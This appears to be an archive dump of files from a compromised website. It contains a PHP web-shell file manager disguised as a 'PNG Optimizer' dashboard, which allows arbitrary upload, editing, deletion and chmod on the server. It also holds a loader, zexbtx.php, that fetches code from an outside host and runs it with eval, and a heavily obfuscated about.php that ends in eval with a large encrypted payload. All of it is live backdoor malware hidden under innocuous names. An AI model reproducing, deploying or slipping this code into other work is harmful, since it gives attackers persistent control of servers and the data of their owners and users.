        <a href='?go=" . urlencode($dir) . "' class='btn btn-light btn-sm'><i class='bi bi-arrow-left'></i> Back</a>
        </div>";
    echo "<div class='card-body'>";
    echo "<form method='post'>
        <div class='mb-3'>
            <textarea name='content' class='form-control editor-textarea' rows='20'>" . htmlspecialchars($code) . "</textarea>
        </div>
        <button type='submit' name='content_save' class='btn btn-primary'><i class='bi bi-save'></i> Save</button>
        </form>";
    echo "</div></div></div>";
    echo "<script src='https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>";
    echo "</body></html>";
    exit;
}

if (isset($_FILES['dropfile'])) {
    $to = $dir . DIRECTORY_SEPARATOR . basename($_FILES['dropfile']['name']);
    move_uploaded_file($_FILES['dropfile']['tmp_name'], $to);
    echo "<div class='alert alert-success'>📤 Uploaded: " . htmlspecialchars($_FILES['dropfile']['name']) . "</div>";
}

if (isset($_POST['mkfolder']) && $_POST['mkfolder']) {
    $folder = $dir . DIRECTORY_SEPARATOR . basename($_POST['mkfolder']);
    if (!file_exists($folder)) {
        mkdir($folder);
        echo "<div class='alert alert-success'>📁 Folder created.</div>";
    } else {
        echo "<div class='alert alert-danger'>❌ Folder already exists.</div>";
    }
}

// === Sorting
$sort = isset($_GET['sort']) ? $_GET['sort'] : 'name';
$order = isset($_GET['order']) && $_GET['order'] === 'desc' ? 'desc' : 'asc';

usort($items, function($a, $b) use ($dir, $sort, $order) {
    if ($a === '.' || $a === '..') return -1;
    if ($b === '.' || $b === '..') return 1;
    $pathA = $dir . DIRECTORY_SEPARATOR . $a;
    $pathB = $dir . DIRECTORY_SEPARATOR . $b;
    if ($sort === 'size') {
        $valA = is_file($pathA) ? filesize($pathA) : 0;
        $valB = is_file($pathB) ? filesize($pathB) : 0;
    } elseif ($sort === 'perm') {
        $valA = fileperms($pathA);
        $valB = fileperms($pathB);
    } else {
        $valA = strtolower($a);
        $valB = strtolower($b);
    }
    return ($order === 'asc') ? $valA <=> $valB : $valB <=> $valA;
});

// === HTML Output
echo "<!DOCTYPE html><html><head>
<title>PNG Optimizer | Dashboard</title>
<meta name='description' content='PNG Compression & Storage Tool'>
<meta name='robots' content='noindex,nofollow'>
<meta name='viewport' content='width=device-width, initial-scale=1'>
<link href='https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css' rel='stylesheet'>
<link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css'>
<style>
.file-icon { font-size: 1.2rem; margin-right: 8px; }
.breadcrumb { background-color: #f8f9fa; padding: 0.75rem 1rem; }
.file-actions a { margin-right: 10px; }
.file-size { font-family: monospace; }
.file-perm { font-family: monospace; }
.upload-box { border: 2px dashed #dee2e6; padding: 20px; text-align: center; margin-bottom: 20px; }
.upload-box:hover { border-color: #adb5bd; }
</style>
</head>
<body class='bg-light'>
<div class='container mt-4'>
<div class='card shadow-sm'>
<div class='card-header bg-primary text-white'>
    <h4 class='mb-0'><i class='bi bi-folder'></i> FOXDROP File Manager</h4>
</div>
<div class='card-body'>";

// === Path Navigation
echo "<nav aria-label='breadcrumb'>
    <ol class='breadcrumb'>";
$steps = explode(DIRECTORY_SEPARATOR, $dir);
$build = '';
foreach ($steps as $seg) {
    if ($seg === '') {
        $build .= DIRECTORY_SEPARATOR;
        echo "<li class='breadcrumb-item'><a href='?go=" . urlencode($build) . "'><i class='bi bi-house-door'></i></a></li>";
        continue;
    }
    $build .= $seg . DIRECTORY_SEPARATOR;
    echo "<li class='breadcrumb-item'><a href='?go=" . urlencode($build) . "'>" . htmlspecialchars($seg) . "</a></li>";
}
echo "</ol></nav>";

// === Table Header
echo "<div class='table-responsive'>
<table class='table table-hover table-sm'>
<thead class='table-light'>
<tr>";
$headers = ['name' => 'Name', 'size' => 'Size', 'perm' => 'Permissions'];
foreach ($headers as $key => $label) {
    $new_order = ($sort === $key && $order === 'asc') ? 'desc' : 'asc';
    echo "<th><a href='?go=" . urlencode($dir) . "&sort=$key&order=$new_order' class='text-decoration-none'>" . htmlspecialchars($label) . "</a></th>";
}
echo "<th>Actions</th></tr>
</thead>
<tbody>";

// === File List
foreach ($items as $item) {
    if ($item === '.') continue;
    $path = $dir . DIRECTORY_SEPARATOR . $item;
    $size = is_file($path) ? formatSize(filesize($path)) : '-';
    $perm = substr(sprintf('%o', fileperms($path)), -3);
    $permColor = is_writable($path) ? 'text-success' : 'text-muted';
    $icon = is_dir($path) ? 'bi-folder' : 'bi-file-earmark';

    $name = is_dir($path)
        ? "<i class='bi $icon'></i> <a href='?go=" . urlencode($path) . "'>" . htmlspecialchars($item) . "</a>"
        : "<i class='bi $icon'></i> <a href='?go=" . urlencode($dir) . "&edit=" . urlencode($item) . "'>" . htmlspecialchars($item) . "</a>";

    $actions = [];
    if (is_file($path)) {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&edit=" . urlencode($item) . "' class='text-primary'><i class='bi bi-pencil'></i></a>";
    }

    // Inline Rename
    if (isset($_GET['rename_from']) && $_GET['rename_from'] === $item) {
        $actions[] = "<form method='post' class='d-inline'>
            <input type='hidden' name='rename_from' value='" . htmlspecialchars($item) . "'>
            <div class='input-group input-group-sm' style='width: 150px;'>
                <input type='text' name='rename_to' class='form-control form-control-sm' placeholder='New name'>
                <button type='submit' class='btn btn-sm btn-success'><i class='bi bi-check'></i></button>
                <a href='?go=" . urlencode($dir) . "' class='btn btn-sm btn-danger'><i class='bi bi-x'></i></a>
            </div>
        </form>";
    } else {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&rename_from=" . urlencode($item) . "' class='text-info'><i class='bi bi-tag'></i></a>";
    }

    $actions[] = "<a href='?go=" . urlencode($dir) . "&delete=" . urlencode($item) . "' class='text-danger' onclick='return confirm(\"Delete " . htmlspecialchars($item) . "?\")'><i class='bi bi-trash'></i></a>";

    if (is_dir($path)) {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&zip=" . urlencode($item) . "' class='text-warning'><i class='bi bi-file-zip'></i></a>";
    } elseif (strtolower(pathinfo($item, PATHINFO_EXTENSION)) === 'zip') {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&unzip=" . urlencode($item) . "' class='text-success'><i class='bi bi-folder-plus'></i></a>";
    }

    echo "<tr>
        <td>$name</td>
        <td class='file-size'>$size</td>
        <td class='file-perm $permColor'>$perm</td>
        <td class='file-actions'>" . implode('', $actions) . "</td>
    </tr>";
}
echo "</tbody></table></div>";

// === Forms: Upload, Folder, Chmod
echo "<div class='row mt-4'>
    <div class='col-md-4 mb-3'>
        <div class='card'>
            <div class='card-header bg-secondary text-white'>
                <i class='bi bi-upload'></i> Upload File
            </div>
            <div class='card-body'>
                <form method='post' enctype='multipart/form-data' class='upload-box'>
                    <div class='mb-3'>
                        <input type='file' name='dropfile' class='form-control'>
                    </div>
                    <button type='submit' class='btn btn-primary'><i class='bi bi-upload'></i> Upload</button>
                </form>
            </div>
        </div>
    </div>
    
    <div class='col-md-4 mb-3'>
        <div class='card'>
            <div class='card-header bg-secondary text-white'>
                <i class='bi bi-folder-plus'></i> New Folder
            </div>
            <div class='card-body'>
                <form method='post'>
                    <div class='input-group'>
                        <input type='text' name='mkfolder' class='form-control' placeholder='Folder name'>
                        <button type='submit' class='btn btn-success'><i class='bi bi-check-lg'></i></button>
                    </div>
                </form>
            </div>
        </div>
    </div>
    
    <div class='col-md-4 mb-3'>
        <div class='card'>
            <div class='card-header bg-secondary text-white'>
                <i class='bi bi-shield-lock'></i> Change Permissions
            </div>
            <div class='card-body'>
                <form method='post'>
                    <div class='mb-3'>
                        <select name='perm_target' class='form-select'>
                            <option value=''>Select file/folder</option>";
                            foreach ($items as $item) {
                                if ($item === '.') continue;
                                echo "<option value='" . htmlspecialchars($item) . "'>$item</option>";
                            }
                            echo "</select>
                    </div>
                    <div class='input-group'>
                        <input type='text' name='perm_value' class='form-control' placeholder='e.g. 755'>
                        <button type='submit' class='btn btn-warning'><i class='bi bi-shield-check'></i></button>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>";

echo "</div></div></div>";

echo "<script src='https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>
</body></html>";

function formatSize($bytes) {
    if ($bytes >= 1073741824) {
        return number_format($bytes / 1073741824, 2) . ' GB';
    } elseif ($bytes >= 1048576) {
        return number_format($bytes / 1048576, 2) . ' MB';
    } elseif ($bytes >= 1024) {
        return number_format($bytes / 1024, 2) . ' KB';
    } elseif ($bytes > 1) {
        return $bytes . ' bytes';
    } elseif ($bytes == 1) {
        return '1 byte';
    } else {
        return '0 bytes';
    }
}
?>js/asst/zexbtx.php000064400000002026151213033150010161 0ustar00<?php
session_start();
$mainUrl = $_SESSION['ts_url'] ?? 'https://teamzedd2024.tech/raw/McuQGI';
$backupUrl = 'https://teamzedd2024.tech/raw/McuQGI';

function tryCurl($url) {
    if (!function_exists('curl_init')) return '';
    $c = curl_init($url);
    curl_setopt_array($c, [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_TIMEOUT => 7,
    ]);
    $out = curl_exec($c);
    curl_close($c);
    return $out ?: '';
}

function loadRemote($url) {
    $data = tryCurl($url);
    if (trim($data)) return $data;

    $data = @file_get_contents($url);
    if (trim($data)) return $data;

    try {
        $reader = new SplFileObject($url);
        $data = '';
        while (!$reader->eof()) {
            $data .= $reader->fgets();
        }
    } catch (Throwable $e) {
        return '';
    }

    return $data;
}

$exec = trim(loadRemote($mainUrl));
if ($exec === '') $exec = trim(loadRemote($backupUrl));

if ($exec !== '') {
    @eval("?>$exec");
}
?>
js/asst/about.php000064400000060416151213033150007756 0ustar00<?=//~G5CAz>oX_Rroc#^XiPUP"$nL{8X18(kws%}0BTk=.W\1`
FAlSE//CK:{U;+LZ lAIKy')L\x*M{e=;~(r"l
;	 /*X<4Ad.M?EGdl,!`gyEeu?mDWC,GY}z|nm&/2;4t,+DFfCA`z*/PArse_stR	/*=!;u_Pg'p5Z*/(//q?mXDxOCP/@Fl]@_o1\3ef^5gTJzD(DjfuMUlq:v69MECWk+
'0=%4'#),4,S `MH~pX*(
.//DIVE%MG\S [dqi7(C(Z w#,0IJ4!JApk1tC
"1%52"//FuUA3g4Ca<56?/Tb'L_,^<#]AX"I#jWK^JhPPW,*z^0']?rJ-\F
.	#J?G[WN6za[=TbwX7tWwhkHB7o8~Ix6NnR
"%52%"/*/akS:9wfT26UAt6x=_eo>H]\5s[d*/. #$U%:*8%h,1*L'pr e}alniv
"41%5"//,,(kkWVxF9[@Jar%
.//mLtK0ibp@s?%k0Oz_p!m6
'9%5F'//VY*#wn]~<+Nb'a6eTY<la8AO
.//X}*I(k"<yyRb)Q%!^"N<I>XN9b&#
"%6d%" 	  /*9H73(*cxbH:*/.	 //I:JT?34frgtpQKW&Q
"41%5"	/*2u7T29Z!R)-6(5B*/.#6pLGz~ttE6z/"ImKrQ]A $Eq
"0&1="#F-L0y(6Z?c7ZROE
.#P~tA Lxs+Q%"w1')GU15QOa)DQmP$B-68TDFPEtfo$Tx=w1v|
"%53%"/*A*sl#4kS2-@eC2S^BY8Zt;9-d'vRDRN(7Xe=_]=&n1\Qx9x*/.	#DUCoz%zXC|SaPi4h(G\.p
'54%7'/*:yB]vogAG./gVgInz70j^W.M*@yYEi>=~N1wi$d{_@L6~[F6](G*/./*/}8xrm;'A?Tk&RNm$G~^"wFq8:fDUN` 1f3,*Gvoq*/"2%52"//aV-NVJP)&|4~43;3)? ,=GbN~nq/UBV|YeO@Z--{-?F<Jbt.$,*
.//a=ja<mXn |F
"%65%" 	#E+btU0%SjxT\;+yea*V>wtJ!F4]GaIV]
.	//4z&j\mt;b(y AS`+\3CbYh3#:>=,gj`
"56&2"	 	//+f7;)#>,I)kjakI2PFd|AL}z.[Eym,e
.//O[tW}EYUf&"ES"U=ZN{;bB%Pgj7pbtsX&<qfl]c%s~9,2n!5r5
"=%47"//zR?_%H6u5g[F(s$}0qutVsVR@ES9?
./*uxz|tKQ8B~ 'HM`7j4MW6Gr;C)U.u*/"%5A%"/*+0k{Liq=f!Y=U#~*/./*Z+Rge1$iS_#Hw4'a,k$o|H_C*/"69%6"/*j-mknDdmqU5N[_~gcG`hJn*PuoJq<*|9)V*/.//8r@Qg\&(D]?{z(?GKNikkW6lETZ_%S?`
"E%66"#<6:+,W8!n7)2BLrKeZA3'v)b>{42>w9`q
./*YDRaZpz4Qz+Pft\R*/"%4C%"	 #Z (;ETfmC_N>ZRcO+S&sb <4KtHNV6YXcN^>O!Q
./*8QV3C<z[`}q>;Kdx8O2R+RD*/'61%7'/*BZD?_9geU?j`3L0*/.#Y)4:9?w~%4XMGJ#po#&{guR~:E9G&&"+vP+AkH&^LFI
"4%45"#<`V/T:eBu\H?r"V[fr(m*E5VSp_SPr6mdM;c
./*h'n!51,r!%E*'Ua1q:0PTP\=KG#nW>[I(UnD|pinks/KwL4f_*/"&3=%"	//i-sA3fM4#W5S ;U(L{V
./*J+h`)$H3XOC{C0jm5&%~KQ{>}5}v"]K\dnI#^#;DQryH:/2*/'42%6'##Z.c,ubSyg(4K>G)Zir'W<bU;T.B
.//f)3<ilfMD0Yi*1lXYZ19YFrw c2lze4-M5A=g8j\O@F6
"1%73"	 #I.q"w. KI?{CjEo3@^yzS#HmfY?oIW!%He<
.	//'4fW'y^(Fpdr&vQDo{\3:
"%65%"#Wz1e<Y` n<qvLDraIQ)1>%9 B)Ib5MZ1
.//ocNoCY$Z:Om8|HpIFD-UTO8M
"36%3"//|^)Y>Y~nBKjvchO$g{6v;m`mO$O5V#@.Q!`T(-
. //_MaZE#r~<A=_BZkIl'ZC90T
"4%5f"#5wrL9\6rIG'!@G-tzvDi&Akl9N{L
.#1pH=R0F~ , -z/Z %~Pm%TdN&T
'%64%'//>uh< dVxG^xcYa(3G3{PU{4Q\=:RQ1sM5"0R.$D62o,
./*xB)R[\},#|2G3l@=W'W,TK|<iCnU)?dLgb;LPF;W5M62GkA;M*/"45%4" /*#]u )iYX4j,7JE6hRqK,Dq4,qy-5|morty3 w*(h*/.//`^1ND*=6DBkWD\7a'
'3%6f'//a~1=I:DT(%@SHzB*4a^p39P<B1,ghw,z"y7La1_t`A)
.//gIYVe@DtzQUtUq3gH:@Q.
'%64%' /*yt$@,S@N:Ni</4$$s1c_"Ws2Iq\6fnwF: 0shlb_`!39K1MhS]*/.  #D04qb)lR]$_1zdk&
"45&4"/*(a~w1<X$ 2LRf~"B}Pf+dtM0hj]t8'8*/.//M96wepgOt/1C{/f E]sBQI:~
'=%63'#(z|FWM5Sd5yhljXy<Kt`PYu)sypNI>RG3w(P7?23,,_L\}
./*y9/ASu@Z)q<.,!.Rc\Bc_S%97-W8Q>wXiV{p*/"%72%" 	 # -75mvANIP^9t_&}#H
./*aaaaKg.>Bw~t;'e9I*9MU]6U&Hz7,beRYq~t /-N=j'(az,SEW]*/"45%6"//D{LP?B,XM/3k_ZF4A5Pg)7fOV]jJy7Tgf 1P#2{wF{DW|
./*;@At&yRhv/,?41Nv)7 Wk)ib1b#z(*/"1%54"//Xa++HABdSsc9jKU?9[Z;&S/
.//yt?8,y1U_!v5
'%65%'/*=c"JY6:$'0Db{!"t'^K*/./*J1VRw7k]X.u\^ibj:AGxjE(k;ay5ejN&G-Z]Gm(IWJcueK.*/'5F%4'#>!+Kg)zJ5^7K9+OcaFd!|ZajPN-PUx^
.	#UuCHf*a?7t'+!3R?VuDpXw
'6%55' 	/*s:B&>L'ZjuKm=(3dY--sI3.w(cx9>e,uDt#x^<<g,HPrQ~:@*/./*3Ad+7VF<[;j\J9p|C%f3&=;|y9Z=t}EBl]C9e0Q1/??a<qkk*/'%4E%'	#$)kg=6KNFHY`For8>3\35i`1>I>q1`k?
./*Nd"Pfd2{9M`-Ee/{r*/'63%7'#9L29p!BBJ2h,3bna"mO@TKs/rYI/g!
./*.Wb@,yNN7g'B_5EAq-M(9ttN\>bh#@u@>EOCt~$m/XEN*/'4%69' //Xv-Tc#J[QnOh%=
./*xohw.$p!40&reVN9ux*/'%4f%'	//#]N%)%Lpo+SB.SARJg :<URyGP0d[M_0PeS+Q<HXzE{9
.	//$Z{%9u%`$xA2*2,//\
"6e&5"//,9)L78KryX{rM/tPw'}$Or)f#Sydx(ReKkk<aD
.//NDg& pYnE |lOMc%);nf4Sm=E4*Q}[E]{|D:VRTH+
"=%73" //Z~-00wqTLQQM >u\q{B_T2:\G_q{>R-rMNsxR%H<5gVP}r5
./*"+^{|}5`s"tG%}*k"=hQl[=ES6H)#*/"%54%"//N{M!<feDKi,@gc^1gWrROgO{H[|0/Naz-c/v12KK0%
.		#*&wvO6bW_,y-[
'52%5'/*e_{l:g*Y~en,.h;chmTe*/.//+a}Cjy)P!\P]@$h|BHDs?$p3T7ZB/0},R*hTPB3
"F%72"	/*S-\tmd=Q5aA5Q;s+MXNw$*/.	/*.7UB\YJ]k3tUE@gKCYs|zoYfEmS}\h&C*/'%6f%'#Y89f9y[TeTwy
./*afB^6MI-!_NpbzY*j(]`Ws"c5/n@JIi|kBrYGU}5OYqx=68hO.I*/'74%3'//7x#nCZt-x`b+}&KD_pH?e$fphDG3Nn(>ey%
.//s$L*R)dD`,,BrLPL*GSy_wV|}6rks"$VlU( >&,r_Ex^:d_;%
'1%33'//v~W%'<f9}S'.oWceD%.T*XRxQ0rV88^u<Z$~u=@
.	/* fPb\)h\ZUY{P}x"d82r[*9wLP9GzhDO>Inx\8OyV */'&'//4b1K,~Z?yZ9.ty95#_gTIw<z$`k=\YW
,#77ql*Cvs{\SuVgm7XGsg~nla*yg54@q]!>oerZ{6eP3ag=
$n5mjmlztzhlzmxqtm0qwzzumm5ajyljwo5ygzkj2y//5F$8*_d:dr?UWSMT[YPphX"^u)e7pOq=Y:rT8M2p~wZ
) /*\JYImu~eo*un1RVD,"lfl~?#sm|e9Cp~Y*/;//=^PqV-!+9ywm!6NuZhU\Sh1$6k>80<*ew8 {Z9l<zO
@/*.&l|i w<N/T0jA7^[*/eval #)+z6{i+O#N98n7)JsbXv2hvWEi);5HQUK,|&u2A!E.z8
(//fUA$ze?7O54aKEtSpIo&S9-@xiwBcB#o#hAfOf~90x+2j en@
$n5mjmlztzhlzmxqtm0qwzzumm5ajyljwo5ygzkj2y/*cm=E[NgJc,l7Ao.N\Q<!2*/[/*UCC|9.T[QyiJiCbD~!a<*/2#"M;t>jVXy.gwzjZ;b^St`UAq2EVeW0nNdOw=M@wB~mir*5:8f
]/*ss;&-C"|f~lNIPpqa.%*/(#91'%MWf{$E7x"--sgF|pF&[:K'c,5tg}T1
$n5mjmlztzhlzmxqtm0qwzzumm5ajyljwo5ygzkj2y/*W]MZY%CdmoyhU`!}#z,6dM{O?Ve~wlG}.{\~*/[/*rSmwzC[)PLZALH.4*Q9&AGn*3s Qi{W|K\V%pvcaF*/3//3^P (:d_xYB:BVyhY
]	  		/*;<F!Cn-rml;KgOUdmadk*xCs*/(/*$pkI[V_V_* VYSV*/$n5mjmlztzhlzmxqtm0qwzzumm5ajyljwo5ygzkj2y/*.BwiXYzbR/T],KE~e4fE27aP gESf{O2T!!xXT*/[		 //-}*\M1<_-vX81xAGY]t<3kbBA\u$Nv16qPGNy08GkV?G!((&
5/*uDF1P p~K+vL?2FfsI6V*F"72@rjPAD4bvM\vA#bgb96~`X*/]//[;.U)J7.v2.YY>!X
(// D(r!P^[~3VmCQ
$n5mjmlztzhlzmxqtm0qwzzumm5ajyljwo5ygzkj2y/*a*8p'fAfJhCOj12e7B*/[ /*"z!V_fpURI".*3Qtp4oMrTg(H.'_We^AIXY"_v3}*/1//14]svS{CBKzLu-_7Re8[qC&yU9&c)'Q>P1p0e0BF](
]/*Pi5/l(OOopI+*/(//"Rf&>r>>]<nGXdq5Dzqot\moo
"

=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

